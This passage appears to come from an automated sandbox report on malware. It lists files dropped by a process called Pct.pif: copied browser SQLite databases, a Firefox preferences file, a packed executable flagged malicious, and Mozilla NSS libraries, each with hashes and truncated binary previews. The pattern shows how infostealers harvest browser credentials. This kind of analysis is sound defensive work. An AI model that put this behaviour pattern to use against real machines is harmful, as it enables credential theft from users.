                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\HCFBAFIDAECAKFHJDBAF

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\JJDGIIDHJEBGIDHJJDBKEHCAAA

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5242880
                                                                                                                                                Entropy (8bit):0.0357803477377646
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\JJKFBFIJJECGCAAAFCBG

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):51200
                                                                                                                                                Entropy (8bit):0.8745947603342119
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\KFCFBFHIEB.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4563640
                                                                                                                                                Entropy (8bit):7.906115886926003
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                                                                                                                MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                                                                                                                SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                                                                                                                SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                                                                                                                SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                                                                                                                C:\ProgramData\KJEBKJDAFHJDGDHJKKEG

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10237
                                                                                                                                                Entropy (8bit):5.498288591230544
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):685392
                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: cmBxQ7gA5a.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: vmgon5Zqja.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: f2e7fcb20146.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: 7f3c2473d1e6.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ScreenUpdateSync.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):608080
                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):450024
                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2046288
                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):257872
                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80880
                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):685392
                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4563640
                                                                                                                                                Entropy (8bit):7.906115886926003
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                                                                                                                MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                                                                                                                SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                                                                                                                SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                                                                                                                SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):608080
                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):450024
                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2046288
                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\627982\Pct.pif
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):257872
                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
